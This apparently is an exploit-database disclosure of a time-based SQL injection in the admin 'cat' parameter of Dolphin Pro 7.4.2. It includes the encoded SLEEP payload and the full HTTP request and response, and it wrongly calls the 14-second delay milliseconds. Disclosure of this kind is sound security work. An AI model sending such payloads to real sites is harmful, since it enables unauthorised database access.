Exploit for Dolphin Pro 7.4.2 SQL Injection

## https://sploitus.com/exploit?id=PACKETSTORM:190012
# Exploit Title: SQL Injection in Admin Functionality - dolphin.prov7.4.2
    # Date: 03/2025
    # Exploit Author: Andrey Stoykov
    # Version: 7.4.2
    # Date: 03/2025
    # Tested on: Debian 12
    # Blog:
    https://msecureltd.blogspot.com/2025/03/friday-fun-pentest-series-21-sql.html
    
    
    SQL Injection in Admin Functionality:
    
    Steps to Reproduce:
    
    1. Login as admin user and visit the page of "
    http://192.168.58.170/dolphinCMS/administration/index.php?cat="
    2. Add the MySQL injection SLEEP payload to the "cat" value
    3. Notice that the backend would delay the HTTP response for 14 miliseconds
    
    
    %27%20and%20(select*from(select(sleep(14)))a)--%20
    
    
    // HTTP GET Request
    
    GET
    /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20
    HTTP/1.1
    Host: 192.168.58.170
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0)
    Gecko/20100101 Firefox/137.0
    [...]
    
    
    // HTTP Response
    
    HTTP/1.1 200 OK
    Date: Thu, 20 Mar 2025 22:55:46 GMT
    Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    Content-Length: 55510